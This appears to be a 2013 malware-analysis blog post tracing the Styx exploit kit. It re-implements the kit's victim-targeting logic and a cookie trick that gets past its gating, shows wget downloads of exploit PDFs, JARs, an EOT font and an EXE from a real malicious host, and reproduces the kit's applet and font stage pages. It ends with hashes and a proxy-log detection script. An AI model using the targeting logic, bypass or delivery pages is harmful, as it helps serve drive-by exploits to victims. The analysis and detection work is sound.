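To see who the kit actually targets, here is an added example (my own code, not the kit's) that re-implements the version gating of the decoded plugin detector above: the same SplitNum quirk, the same Reader version ranges and the same user-agent checks, so a defender can feed in a browser/Reader combination and read off which stage it would be steered to. The stage file names and ranges come from the script above; the function names and the user-agent strings are my own.

```javascript
// Added example, not the kit's code: the Styx plugin detector's version gating
// as plain functions. Ranges, stage file names and the SplitNum quirk come from
// the decoded script; the helper names and sample user agents are constructed.

function splitNum(str) {
  // Same behaviour as the kit's SplitNum: take up to four numeric components,
  // pad missing ones with "0", join with no separator ("9.3" -> "9300").
  const spl = str.split(/[._,-]/);
  const ret = [];
  for (let i = 0; i < 4; i++) {
    ret[i] = spl[i] !== undefined ? spl[i] : "0";
  }
  return ret.join("");
}

function getNum(str) {
  // First run of digits (with . _ , - separators) anywhere in the string,
  // e.g. "Adobe PDF Plug-In 9.3.0" -> "9300".
  const m = String(str).match(/\d[\d._,-]*/);
  return m ? splitNum(m[0]) : "";
}

function pdfVersionNumber(versionString) {
  const v = getNum(versionString);
  return v === "" ? 0 : parseInt(v, 10);
}

// The EOT/font stage: only 32-bit Internet Explorer (no "wow64" in the UA).
function fontStage(userAgent) {
  const ua = userAgent.toLowerCase();
  return ua.indexOf("wow64") < 0 && ua.indexOf("msie") >= 0 ? "fnts.html" : null;
}

// The PDF-or-Java stage: Windows only, never Chrome, then gated on Reader version.
function pdfOrJavaStage(userAgent, readerVersion) {
  const isWindows = userAgent.toLowerCase().indexOf("win") >= 0;
  const isChrome = userAgent.indexOf("Chrome") >= 0;
  if (!isWindows || isChrome) return null;
  const pdfver = pdfVersionNumber(readerVersion);
  const newReader = (pdfver >= 8000 && pdfver <= 8200) || (pdfver >= 9000 && pdfver <= 9300);
  const oldReader = pdfver >= 6000 && pdfver < 8000;
  if (newReader) return "XwYBSGiPQ.pdf";
  if (oldReader) return "xSbGQp.pdf";
  return "jovf.html"; // Java applet page, written after a 3 s delay in the kit
}

// Constructed user agents for the demonstration.
const IE8_32BIT = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)";
const IE8_64BIT = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)";
const CHROME_WIN = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31";
const FIREFOX_LINUX = "Mozilla/5.0 (X11; Linux x86_64; rv:20.0) Gecko/20100101 Firefox/20.0";

console.log(fontStage(IE8_32BIT), pdfOrJavaStage(IE8_32BIT, "9.2.0"));
```

Two things fall out of running this: a fully patched 9.x Reader (9.3.4 and later, which SplitNum turns into 9340) skips both PDFs and lands on the Java applet page, and a machine with no Reader at all (version 0) goes straight to the applet as well, so the JAR is the fallback for everyone on Windows who is not using Chrome.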

Plenty of exploits to look into here, it seems:

5. EOT, PDFs and JAR

The PDF filenames finally came out, so let's get them first.


--2013-04-06 --  hxxp: //rupscare.org/eNLShv0OTec0p3C402mlb0ZrKE0d9420eFIA16FxJ0kSCu0VXk/XwYBSGiPQ.pdf
Resolving rupscare.org... 5.45.183.91
Connecting to rupscare.org|5.45.183.91|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.0 200 OK
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Content-Type: text/html;charset=utf-8
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Pragma: no-cache
  Server: nginx/0.7.64
  Set-Cookie: PHPSESSID=2656631333133303637343939356934613031633362616731643533383832383; path=/
  X-Mode: HTML
  X-Powered-By: ASP.NET version 4
  Content-Encoding: gzip
  X-Powered-By: HPHP
  Connection: keep-alive
  Content-Length: 5267
Length: 5267 (5.1K) [text/html]
Saving to: `XwYBSGiPQ.pdf'

     0K .....                                                 100% 1.29M=0.004s

2013-04-06  (1.29 MB/s) - `XwYBSGiPQ.pdf' saved [5267/5267]

--2013-04-06 --  hxxp: //rupscare.org/eNLShv0OTec0p3C402mlb0ZrKE0d9420eFIA16FxJ0kSCu0VXk/xSbGQp.pdf
Resolving rupscare.org... 5.45.183.91
Connecting to rupscare.org|5.45.183.91|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.0 200 OK
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Content-Type: text/html;charset=utf-8
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Pragma: no-cache
  Server: nginx/0.7.64
  Set-Cookie: PHPSESSID=5603236336331366163353933356264326263663938313561633832343131656; path=/
  X-Mode: HTML
  X-Powered-By: ASP.NET version 4
  Content-Encoding: gzip
  X-Powered-By: HPHP
  Connection: keep-alive
  Content-Length: 3601
Length: 3601 (3.5K) [text/html]
Saving to: `xSbGQp.pdf'

     0K ...                                                   100% 99.1M=0s

2013-04-06  (99.1 MB/s) - `xSbGQp.pdf' saved [3601/3601]



Now let's see what's behind fnts.html.
PS: cookie needed. You get a 402 reply if the landing pane is not visited again.

JavaScript to generate the cookie value:

// Cookie name and value as set by PktSEI() in the decoded plugin detector;
// krZBmfUN is defined as "&h=32" in pdfx.html
var c_name = "fGGhTasdas";
var krZBmfUN = "&h=32";
var value = krZBmfUN;
var exdays = 1;
var exdate = new Date();
exdate.setDate(exdate.getDate() + exdays);
var c_value = escape(value) + ((exdays == null) ? "" : "; expires=" + exdate.toUTCString());
console.log(c_name + "=" + c_value);



--2013-04-06 --  hxxp: //rupscare.org/eNLShv0OTec0p3C402mlb0ZrKE0d9420eFIA16FxJ0kSCu0VXk/fnts.html
Resolving rupscare.org... 5.45.183.91
Connecting to rupscare.org|5.45.183.91|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.0 200 OK
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Content-Type: text/html;charset=utf-8
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Pragma: no-cache
  Server: nginx/0.7.64
  Set-Cookie: PHPSESSID=5366735656365663830336530343464373133666562353636643234693561343; path=/
  X-Mode: HTML 
  X-Powered-By: ASP.NET version 4
  X-Powered-By: HPHP
  Connection: keep-alive
  Content-Length: 354
Length: 354 [text/html]
Saving to: `fnts.html'
  
     0K                                                       100% 5.23M=0s
  
2013-04-06  (5.23 MB/s) - `fnts.html' saved [354/354]



<html>
<head>
<title>Pbksidiadqagem</title>
</head>
<style>@font-face{src:url('PjNmvEsWb.eot');font-family:'p1';}#StbxuMAxj{font-size:5px;line-height:normal;font-family:'p1';position:absolute;top:0px;left:0px;}</style>
<body onload="try{window.focus();}catch(e){}">
<div style="top:0px;position:absolute;left:0px;" id="StbxuMAxj">:)</div>
</body>
</html>



Let's go and fetch the EOT right away:

--2013-04-06 --  hxxp: //rupscare.org/eNLShv0OTec0p3C402mlb0ZrKE0d9420eFIA16FxJ0kSCu0VXk/PjNmvEsWb.eot
Resolving rupscare.org... 5.45.183.91
Connecting to rupscare.org|5.45.183.91|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.0 200 OK
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Content-Type: text/html;charset=utf-8
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Pragma: no-cache
  Server: nginx/0.7.64
  Set-Cookie: PHPSESSID=1693234323166326033336933653937363137393637366661653466673736356; path=/
  X-Mode: HTML
  X-Powered-By: ASP.NET version 4
  Content-Encoding: gzip
  X-Powered-By: HPHP
  Connection: keep-alive
  Content-Length: 4320
Length: 4320 (4.2K) [text/html]
Saving to: `PjNmvEsWb.eot'

     0K ....                                                  100%  120M=0s

2013-04-06 (120 MB/s) - `PjNmvEsWb.eot' saved [4320/4320]



And the last action from the Plugin Detector: jovf.html
PS2: once again we need to start at the landing pane to avoid 402s.

--2013-04-07 --  hxxp: //rupscare.org/eNLShv0OTec0p3C402mlb0ZrKE0d9420eFIA16FxJ0kSCu0VXk/jovf.html
Resolving rupscare.org... 5.45.183.91
Connecting to rupscare.org|5.45.183.91|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.0 200 OK
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Content-Type: text/html;charset=utf-8
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Pragma: no-cache
  Server: nginx/0.7.64
  Set-Cookie: PHPSESSID=8326564323361343631346469316133373133653335613233326433323637353; path=/
  X-Mode: HTML
  X-Powered-By: ASP.NET version 4
  X-Powered-By: HPHP
  Connection: keep-alive
  Content-Length: 335
Length: 335 [text/html]
Saving to: `jovf.html'

     0K                                                       100% 16.9M=0s

2013-04-07 (16.9 MB/s) - `jovf.html' saved [335/335]



<html>
<head>
<title>Ymqdiaqbwcgvvze</title>
</head>
<body>
<applet archive="cCJVRwhSC.jar" code="YoHmO">
<param name="sfPsrI" value="&h=12"/>
</applet>
<script>
try{
    document.applets[0].lKvIr("");
} catch(err){};
var UJZhmKT="";
if(UJZhmKT!="")
    setTimeout("window.top.location.href = UJZhmKT", 5000);
</script>
</body>
</html>



Aha, another JAR. Let's pick it up:

--2013-04-07 --  hxxp: //rupscare.org/eNLShv0OTec0p3C402mlb0ZrKE0d9420eFIA16FxJ0kSCu0VXk/cCJVRwhSC.jar
Resolving rupscare.org... 5.45.183.91
Connecting to rupscare.org|5.45.183.91|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.0 200 OK
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Content-Type: text/html;charset=utf-8
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Pragma: no-cache
  Server: nginx/0.7.64
  Set-Cookie: PHPSESSID=2603138343133346031363230316537356032656431343634323466353439316; path=/
  X-Mode: HTML
  X-Powered-By: ASP.NET version 4
  Content-Encoding: gzip
  X-Powered-By: HPHP
  Connection: keep-alive
  Content-Length: 7343
Length: 7343 (7.2K) [text/html]
Saving to: `cCJVRwhSC.jar'

     0K .......                                               100% 3.21M=0.002s

2013-04-07 (3.21 MB/s) - `cCJVRwhSC.jar' saved [7343/7343]



Phew, lots of good stuff in this kit. Let's see if we can bring it all home across the river.

6. Fetching the JAR

From the gate/landing pane we got first, we need to get the JAR.


2013-04-06 (24.6 MB/s) - `pane.html' saved [482/482]

--2013-04-06 --  hxxp: //rupscare.org/eNLShv0OTec0p3C402mlb0ZrKE0d9420eFIA16FxJ0kSCu0VXk/IriBA.jar
Resolving rupscare.org... 5.45.183.91
Connecting to rupscare.org|5.45.183.91|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.0 200 OK
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Content-Type: text/html;charset=utf-8
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Pragma: no-cache
  Server: nginx/0.7.64
  Set-Cookie: PHPSESSID=1673931303664613336326534616932613832323469323531643463393431643; path=/
  X-Mode: HTML
  X-Powered-By: ASP.NET version 4
  Content-Encoding: gzip
  X-Powered-By: HPHP
  Connection: keep-alive
  Content-Length: 11678
Length: 11678 (11K) [text/html]
Saving to: `IriBA.jar'

     0K .......... .                                          100% 12.4M=0.001s

2013-04-06  (12.4 MB/s) - `IriBA.jar' saved [11678/11678]

Hopefully I get the time to look more into the JAR some other day...

7. Grabbing the EXE

Since the EXE file was up for grabs in the landing pane, not much work was needed:

--2013-04-06 --  hxxp: //rupscare.org/zNUdi611VKX0IDkq01jcK0dBBK0Q58F0rlJQ0HCzj0CaX90rFSv0076B01qoF05Oka0sF6F0xPVY16jTn17bNp0odl10d0TL0629S0F84i0FHxP0wT6105b9D0FEWS0Kr4U0swQx0ZdqR0Dw0B0wCUu0ZkH50rXuR0Uc7v0skdD0MhrU15SwC0iNDa0iOGF0HCX113Tui/xMCOakDS1p.exe?gO=aTtOki&h=11
Resolving rupscare.org... 5.45.183.91
Connecting to rupscare.org|5.45.183.91|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.0 200 OK
  Cache-Control: no-cache, must-revalidate
  Content-Disposition: attachment; filename="RivcgrcunV.exe"
  Content-Transfer-Encoding: binary
  Content-Type: application/octet-stream; charset=binary
  Expires: Mon, 26 Jul 1997 05:00:00 GMT
  Last-Modified: Fri, 05 Apr 2013 12:02:17 GMT
  Pragma: no-cache
  Server: nginx/0.7.64
  Set-Cookie: PHPSESSID=1346367346035326430356463336462623734656164346233643164343732366; path=/
  X-Mode: RAW
  X-Powered-By: ASP.NET version 4
  Content-Encoding: gzip
  X-Powered-By: HPHP
  Connection: keep-alive
  Content-Length: 209409
Length: 209409 (205K) [application/octet-stream]
Saving to: `xMCOakDS1p.exe'

     0K .......... .......... .......... .......... .......... 24%  549K 0s
    50K .......... .......... .......... .......... .......... 48%  537K 0s
   100K .......... .......... .......... .......... .......... 73% 1000K 0s
   150K .......... .......... .......... .......... .......... 97% 1.05M 0s
   200K ....                                                  100%  139K=0.3s

2013-04-06 (654 KB/s) - `xMCOakDS1p.exe' saved [209409/209409]



No obfuscation, packed with UPX though. Guess that's why it would not run in my VM. EXE analysis is not my game, so I leave that to others.

8. Quick analysis

PDF1:
MD5: 95ca89b073d80dc7468d5919bb41c8c8
VT: 7/46

PDF2:
MD5: 3dff91a1ec7615e93f783eb66a5d97c5
VT: 9/46

JAR1:
MD5: e31e17abf678d2a05e68db9f6c2b3ac8
VT: 6/45

JAR2:
MD5: 2f95a9b361ab622e9616472ae57e3bb3
VT: 4/46

EOT:
MD5: fc67300a7ec85a41eb9836925816fa74
VT: 1/46

EXE:
MD5: 376bee885c5af20f067bbbb073863d8d
VT: 20/46

9. Styx seen with Wireshark

Landing pane (screenshot)

Redirect to plugin detect (screenshot)

EXE download (screenshot)



10. Detection

Looks like the signature proposals over at @malwaresigs are pretty good. But a slight change was seen compared to what @kafeine reported, in one of the static links in the pdfx.html file:
jovf.html - changed from ie78xp.html

Add jovf.html to the signature to detect the change, or add both jovf.html and fnts.html.
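As an added example (my own code, not from the post or from @malwaresigs), here is a small proxy-log check for the URI shape seen throughout this walk-through: one long alphanumeric directory followed by a short stage file, with the stage names from this kit (pdfx.html, ocll.html, jovf.html, fnts.html) scored higher than other files under the same kind of path. The log lines and their format are constructed; the directory and file names are the ones seen above.

```javascript
// Added example, not from the post: a proxy-log check for the Styx URI shape
// discussed above. Log lines below are constructed; the directory and stage
// file names are the ones seen in this kit. Function names are my own.

// Stage files named in this post's walk-through of the kit.
const STYX_STAGE_FILES = ["pdfx.html", "ocll.html", "jovf.html", "fnts.html"];

// Styx paths here: one long alphanumeric directory (the landing path above is
// 50 characters) followed directly by a short stage file name.
const STYX_PATH_RE = /\/[A-Za-z0-9]{40,}\/([A-Za-z0-9]+\.(?:html|js|pdf|eot|jar|exe))(?:$|\?)/;

// Returns {file, confidence} for a single URL, or null when it does not fit.
function classifyUrl(url) {
  const m = STYX_PATH_RE.exec(url);
  if (!m) return null;
  const file = m[1];
  const confidence = STYX_STAGE_FILES.indexOf(file) >= 0 ? "high" : "medium";
  return { file, confidence };
}

// Lines are "<timestamp> <client> <method> <url> <status>" (constructed format).
function flagStyxRequests(lines) {
  const hits = [];
  lines.forEach((line, index) => {
    const fields = line.trim().split(/\s+/);
    if (fields.length < 5) return; // malformed line: skip rather than crash
    const verdict = classifyUrl(fields[3]);
    if (verdict) hits.push({ line: index + 1, client: fields[1], ...verdict });
  });
  return hits;
}

// Constructed sample log built from the paths seen in this post.
const LANDING = "http://rupscare.org/eNLShv0OTec0p3C402mlb0ZrKE0d9420eFIA16FxJ0kSCu0VXk/";
const SAMPLE_LOG = [
  "2013-04-06T10:00:01Z 10.0.0.5 GET " + LANDING + " 200",
  "2013-04-06T10:00:01Z 10.0.0.5 GET " + LANDING + "aDHRYLxXI.js 200",
  "2013-04-06T10:00:02Z 10.0.0.5 GET " + LANDING + "pdfx.html 200",
  "2013-04-06T10:00:06Z 10.0.0.5 GET " + LANDING + "jovf.html 200",
  "2013-04-06T10:00:09Z 10.0.0.5 GET http://rupscare.org/zNUdi611VKX0IDkq01jcK0dBBK0Q58F0rlJQ0HCzj0CaX90rFSv0076B01qoF05Oka0sF6F0xPVY16jTn17bNp0odl10d0TL0629S0F84i0FHxP0wT6105b9D0FEWS0Kr4U0swQx0ZdqR0Dw0B0wCUu0ZkH50rXuR0Uc7v0skdD0MhrU15SwC0iNDa0iOGF0HCX113Tui/xMCOakDS1p.exe?gO=aTtOki&h=11 200",
  "2013-04-06T10:00:15Z 10.0.0.6 GET http://example.com/docs/index.html 200",
];

console.log(flagStyxRequests(SAMPLE_LOG));
```

The landing request itself (directory only, no file) is not flagged, which is the point of the @malwaresigs-style approach: the stage files are the stable part, the directory names rotate. The "medium" hits for the JS and the EXE under the same path shape are what you would chain together in a correlation rule rather than alert on alone.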

11. Epilogue

That went well. We made it to the underworld and back with most of the goods we headed out to steal.
Lots of fun stuff for further processing here. Most of it seems old though. I might try to up my skills on some PDF analysis and more JAR analysis some other day.

Always good to have something waiting in case one gets bored one day and/or wants to learn some more...


Happy river crossing to the underworld for malware theft :)

Other Styx references:
@kafeine. EK master, on Styx

Pattern change reported by @Malwarebiopsy 

1 comment:

  1. Great job Brother learned some good stuff from this and enjoyed!
